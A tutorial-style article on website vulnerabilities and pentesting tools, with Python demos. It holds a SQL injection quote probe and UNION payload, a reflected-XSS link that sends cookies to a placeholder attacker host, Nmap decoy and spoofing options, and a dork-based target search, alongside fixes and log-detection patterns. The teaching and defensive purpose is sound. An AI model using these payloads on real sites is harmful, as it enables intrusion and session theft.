
Website vulnerabilities. Checking a website. Programs for finding website vulnerabilities

The topic of website security has never been as pressing as it is in the 21st century. The reason is the spread of the Internet into almost every industry and field. Every day hackers and security specialists find new website vulnerabilities. Many of them are closed promptly by site owners and developers, but some remain as they are, and those are the ones attackers exploit. A compromised site causes serious problems both for its visitors and for the servers that host it.

Types of website vulnerabilities

Web applications are built on many related technologies. Some of them have been tested over the years; others are new and not yet battle-hardened. In either case, the following types of website vulnerabilities are encountered:

  • XSS (cross-site scripting). Almost every site has small forms: they let visitors enter data and get a result, register, or send messages. If specially crafted input containing HTML or JavaScript is written into such a form and the site echoes it back without encoding, the code runs in other visitors' browsers. That breaks the integrity of the site and compromises user data.
  • SQL injection. A very common and effective way to get at confidential data. It can be carried out through the address bar or through forms. Values that the script does not filter are inserted into a query to the database; with a correctly crafted payload this turns into a full security breach.
  • HTML injection. Almost the same as XSS, but instead of script code it is plain HTML (for example a fake login form) that is injected.
  • Vulnerabilities related to files and directories left in default locations. For example, knowing the structure of the pages, one can reach the administration panel or its source code directly.
  • Insufficient protection of the operating system on the server. If an OS-level vulnerability exists, the attacker can execute arbitrary commands on the host.
  • Weak passwords. One of the most common website vulnerabilities: weak combinations used to protect accounts, especially the administrator's.
  • Buffer overflow. Occurs when data written past the end of a buffer overwrites adjacent memory, so that program data or control flow can be altered. It is the result of bugs in imperfectly written software.
  • Spoofing of the site or parts of it. An exact copy of the site is built so that the user, suspecting nothing, enters their data, which then ends up with the attacker.
  • Denial of service. Usually this term means an attack in which the server receives more requests than it can handle and simply "goes down" or stops serving real users. The weakness here is the lack of correctly configured filtering and rate limiting in front of the server.

Scanning a site for vulnerabilities

Security specialists perform a dedicated audit of a web resource for errors and shortcomings that could lead to a compromise. Such a check of a site is called pentesting. The process includes analysis of the source code used by the CMS, checking for the presence of vulnerable components, and many other tests.

SQL injection

This type of test establishes whether the script filters the values it receives when building queries to the database. The simplest test can be done by hand. How do you find a SQL vulnerability on a site? Let's look.

For example, there is a site my-sayt.rf. On its front page there is a catalog. Opening it, you may find in the address bar something like my-sayt.rf/?product_id=1. It is likely that this value goes into a database query. To look for a vulnerability, first try inserting a single quote into the line, that is my-sayt.rf/?product_id=1'. If after pressing Enter the page shows a database error message, the vulnerability is there. Two caveats: a quiet page is not proof of safety, because the error may be hidden while the injection still works (blind injection), and even this test changes the query the server runs, so only do it on a site you are authorized to test.

After that, various extraction techniques can be used: UNION queries, cutting off the rest of the query with a comment sequence, and many others.
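The single-quote probe and the UNION extraction described above, together with the parameter-binding advice in the security tips section, as an added example that is not part of the original article. It uses Python's built-in sqlite3 module with a constructed in-memory shop database; the table and column names, the hash value and the function names are assumptions made for the illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the shop's backend (assumed schema, not from the article)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'Kettle', '19.99'), (2, 'Toaster', '24.50');
        INSERT INTO users VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return conn


def lookup_vulnerable(conn, product_id):
    """Builds the query by string concatenation: whatever arrives in ?product_id= is parsed as SQL."""
    sql = "SELECT name, price FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, product_id):
    """Binds the value as a parameter: it is compared as data and never parsed as SQL."""
    sql = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def quote_probe(lookup, conn, product_id):
    """The manual test from the text: append a single quote and see whether the backend errors."""
    try:
        lookup(conn, product_id + "'")
    except sqlite3.Error:
        return True      # a syntax error reached the database: the input is not filtered
    return False


# Second stage from the text: a UNION that appends rows from another table to the result.
UNION_PAYLOAD = "1 UNION SELECT login, password_hash FROM users"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, quote probe:", quote_probe(lookup_vulnerable, db, "1"))   # True
    print("vulnerable, UNION:", lookup_vulnerable(db, UNION_PAYLOAD))            # leaks the users table
    print("safe, quote probe:", quote_probe(lookup_safe, db, "1"))               # False
    print("safe, UNION:", lookup_safe(db, UNION_PAYLOAD))                        # []
```

Note that the safe version neither rejects the payload nor errors out; it simply compares the whole string as a value and finds no matching id. An integer check on product_id is still worth having, but binding is what removes the injection.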

XSS

This type of vulnerability comes in two forms: active (stored) and passive (reflected).

Active means embedding a piece of code into the database or into a file on the server, so that it is served to every visitor of the affected page. It is the more dangerous and less predictable form.

The passive form requires luring the victim to a specific address on the site, with the malicious code contained in the address itself.

Using XSS, an attacker steals cookies, which carry important user data. An even more serious consequence is hijacking the user's session.

The attacker can also use a script on the site so that, at the moment of submission, a form passes the user's data straight into the attacker's hands.
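The reflected (passive) cookie-stealing link described above and its fix, as an added example that is not part of the original article. The URL uses the article's my-sayt.rf as the target; the /search path, the q parameter, the host attacker.example and the function names are assumptions made for the illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed link for a reflected XSS: the victim follows it, the server echoes q into the page,
# and the script sends document.cookie to a host the attacker controls (attacker.example is a placeholder).
PAYLOAD_URL = (
    "http://my-sayt.rf/search?q=%3Cscript%3E"
    "document.location%3D%27http%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie"
    "%3C%2Fscript%3E"
)


def query_param(url, name="q"):
    """Extracts and URL-decodes one query parameter, as the web server would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(q):
    """Reflects the raw parameter into the HTML body: the browser runs whatever it contains."""
    return "<p>Results for: " + q + "</p>"


def render_safe(q):
    """Entity-encodes < > & \" ' so the parameter is displayed as text and never parsed as markup."""
    return "<p>Results for: " + html.escape(q, quote=True) + "</p>"


def has_active_content(page):
    """Crude check for executable content in rendered HTML: script tags, javascript: URLs, event handlers."""
    return re.search(r"<\s*script|javascript:|\bon\w+\s*=", page, re.I) is not None


if __name__ == "__main__":
    q = query_param(PAYLOAD_URL)
    print(q)                                          # the decoded <script>...</script> payload
    print(has_active_content(render_vulnerable(q)))   # True
    print(has_active_content(render_safe(q)))         # False
```

html.escape with quote=True covers text content and quoted attribute values; inside a script block, a URL or CSS a context-specific encoder is needed. Marking the session cookie HttpOnly keeps document.cookie from reading it, which blunts this particular payload even if the reflection remains.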

Automating the check

On the net you can find many tools for scanning sites for vulnerabilities. Some come on their own, others come bundled with many similar ones into a single image, such as Kali Linux. Below are the most popular tools for automating the collection of information about vulnerabilities.

Nmap

A simple scanner that can show such details as open ports and the services behind them, and the operating system in use. Example usage:

nmap -sS 127.0.0.1, where instead of the loopback address you substitute the real address of the site under test.

The output reports which services are running on the host and which ports are open at the moment. Based on this, you can look for already known vulnerabilities in those services.

A few options to tailor the scan:

  • -A. An aggressive scan that gives a lot of information (version detection, OS detection, script scan, traceroute) but can take a long time.
  • -O. Attempts to determine the operating system running on the host.
  • -D. Decoy scanning: the probes appear to come from additional spoofed IP addresses as well, so that someone reading the server logs cannot easily tell where the scan came from.
  • -p. Port range. Checks the listed ports rather than the default set.
  • -S. Specifies the source IP address of the probes. Because the address is spoofed, replies do not come back to you, so this is used together with -e on a network you control.

WPScan

This program for checking site vulnerabilities is part of the Kali Linux distribution. It scans web resources running the WordPress CMS. It is written in Ruby, so it runs like this:

ruby ./wpscan.rb --help. This command shows the available options and keys. (Current versions are installed as a Ruby gem and are run simply as wpscan.)

A simple test is run with the command:

ruby ./wpscan.rb --url some-sayt.ru

Overall, WPScan is a nice and easy-to-use utility for checking your site for WordPress vulnerabilities.

Nikto

A program for checking sites for vulnerabilities, also available in the Kali Linux distribution. For all its simplicity it is quite powerful:

  • scans over both HTTP and HTTPS;
  • has evasion options for getting past many intrusion detection tools;
  • scans several ports, including non-standard ranges;
  • supports working through proxy servers;
  • lets you write and connect plugins.

To run nikto, perl must be installed on the system. The simplest scan is run as follows:

perl nikto.pl -h 192.168.0.1

The program can also be "fed" a text file with a list of web server addresses:

perl nikto.pl -h file.txt

This tool helps not only security staff doing a pentest, but also network administrators keeping their sites healthy.

Burp Suite

A very powerful tool for checking not only sites but any web traffic. It has a built-in proxy for modifying requests on their way to the server under test. A smart scanner can automatically look for several kinds of vulnerabilities at once. The state of the current session can be saved and resumed later. It is extensible: not only third-party plugins, but your own as well.

The utility has its own graphical user interface, which is undoubtedly convenient, especially for novice users.

SQLmap

Perhaps the best-known and most powerful tool for finding and exploiting SQL injection (it does not look for XSS; that is a separate class of tools). Its strengths can be summarized as:

  • support for almost all types of database management systems;
  • the main injection techniques: boolean-based blind, time-based blind, error-based, UNION-based, stacked queries and out-of-band;
  • a mode for enumerating users, their password hashes, and cracking those hashes by dictionary.

Before using SQLmap, many people first look for a vulnerable site by means of dorks, search engine queries that pick out roughly suitable web resources. Scanning sites found that way without their owners' permission is illegal in most jurisdictions; use the tool on resources you are authorized to test.

Then the page address is passed to the program and checked. If injection is confirmed, the utility can exploit it on its own, up to full access to the resource.

Webslayer

A small utility for brute-force attacks. It brute-forces forms, parameters and parts of a site. It supports multithreading, which greatly improves speed. It can recursively search directories found in nested locations and brute-force logins to the pages it discovers. There is proxy support.

Online resources for checking

On the net there are many tools for checking a site for vulnerabilities online:

  • coder-diary.ru. A simple site scanner. Enter the resource address and click "Check". The search may take a long time, so you can give your e-mail address and the finished results will be sent straight to your inbox. Its database holds about 2,500 known vulnerabilities.
  • https://cryptoreport.websecurity.symantec.com/checker/. An online service from Symantec for checking SSL and TLS certificates. It requires only the address of the resource.
  • https://find-xss.net/scanner/. The service takes a PHP file for scanning, either from a link or as a ZIP archive. You can set the types of files to be scanned and the characters with which data passed to the script are escaped.
  • http://insafety.org/scanner.php. A scanner for testing sites on the "1C-Bitrix" platform. Simple and intuitive interface.

The algorithm for finding vulnerabilities

Any network security specialist performs the check by a simple algorithm:

  1. First, manually or with automated tools, analyze whether the site has any vulnerabilities. If it does, determine their type.
  2. Depending on the type of vulnerability found, plan the next moves. For example, if the CMS is known, choose the attack method appropriate to it; if it is SQL injection, pick the queries to send to the database.
  3. The main goal is to obtain privileged access to the administration panel. If that cannot be achieved, it may be worth trying to craft a malicious address with an embedded script and redirect the victim to it.
  4. If the attack or penetration fails, data collection begins: are there any other vulnerabilities, what shortcomings are present.
  5. Based on the collected data, the security specialist tells the site owner about the problems and how to fix them.
  6. The vulnerabilities are fixed by the owner or with the help of third-party specialists.

A few security tips

Those who develop their own website will find these simple tips and tricks useful.

Incoming data must be validated and, for database access, passed as bound parameters rather than concatenated into the query text, so that user input can never run as a script or change the query sent to the database.

Use long, complex passwords for the administration panel, to rule out brute force.

If the site is built on a CMS, check plugins, themes and components carefully and update them regularly. Do not overload the site with components it does not need.

Check the server logs regularly for any suspicious events or actions.
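The kind of log check this tip has in mind, as an added example that is not part of the original article: the probes from the SQL injection and XSS sections, and the user agents of the scanners discussed above, leave recognisable traces in the web server's access log. The sample log lines, the signature list and the scanner user-agent strings are constructed for the illustration and assumed, not taken from the page or from the tools' documentation.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" log format (not real traffic). The first three
# lines replay the single-quote and UNION probes from the SQL injection section, the fourth a
# reflected XSS attempt, the fifth a request carrying an assumed WPScan user agent.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2018:13:55:36 +0000] "GET /?product_id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2018:13:55:41 +0000] "GET /?product_id=1%27 HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2018:13:56:02 +0000] "GET /?product_id=1+UNION+SELECT+login,password_hash+FROM+users HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2018:14:01:10 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2018:14:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3300 "-" "WPScan v3.8.0 (https://wpscan.org/)"
192.0.2.44 - - [10/May/2018:14:05:12 +0000] "GET /about.html HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each signature is applied to the URL-decoded request target and to the user agent.
SIGNATURES = (
    ("sqli_quote", lambda target, ua: "'" in target),
    ("sqli_union", lambda target, ua: re.search(r"\bunion\s+(all\s+)?select\b", target, re.I) is not None),
    ("xss", lambda target, ua: re.search(r"<\s*script|javascript:|\bon\w+\s*=", target, re.I) is not None),
    # Substrings assumed to appear in the default user agents of the scanners named in this article.
    ("scanner_ua", lambda target, ua: re.search(r"nikto|wpscan|sqlmap", ua, re.I) is not None),
)


def parse_line(line):
    """Parses one combined-format line into a dict, or returns None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode %xx and '+' first: probes usually arrive URL-encoded, as in the sample above.
    rec["decoded"] = unquote_plus(rec["target"])
    return rec


def scan_log(text):
    """Returns (ip, tag, decoded_target) for every signature hit in the log text."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for tag, matches in SIGNATURES:
            if matches(rec["decoded"], rec["ua"]):
                findings.append((rec["ip"], tag, rec["decoded"]))
    return findings


def suspicious_ips(findings, threshold=2):
    """Source addresses with at least `threshold` hits, sorted; these are the ones to block or investigate first."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, tag, target in hits:
        print(f"{ip:15} {tag:12} {target}")
    print("suspicious:", suspicious_ips(hits))   # ['198.51.100.9', '203.0.113.7']
```

In practice the same scan would read the rotated log files and run on a schedule. The signatures and the threshold are deliberately simple and will miss double-encoded or blind probes, so treat the result as a first filter rather than a verdict.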

Check your site with several scanners and services.

Correct server configuration is the key to stable and safe operation.

If at all possible, use an SSL certificate. This prevents interception of personal or confidential data in transit between the server and the user.

Protection tools. It makes sense to install or connect software that detects and prevents intrusions and external threats.

Conclusion

The article has turned out quite long, but even so it is not enough to describe in detail every aspect of network security. To cope with information security properly you need to study many materials and instructions, as well as a whole set of tools and technologies. You can also ask for advice and help from professional companies that specialize in pentesting and auditing web resources. Although such services cost a decent sum, site security can end up costing far more in economic and reputational terms.


Copyright © 2018 ny.unansea.com. Theme powered by WordPress.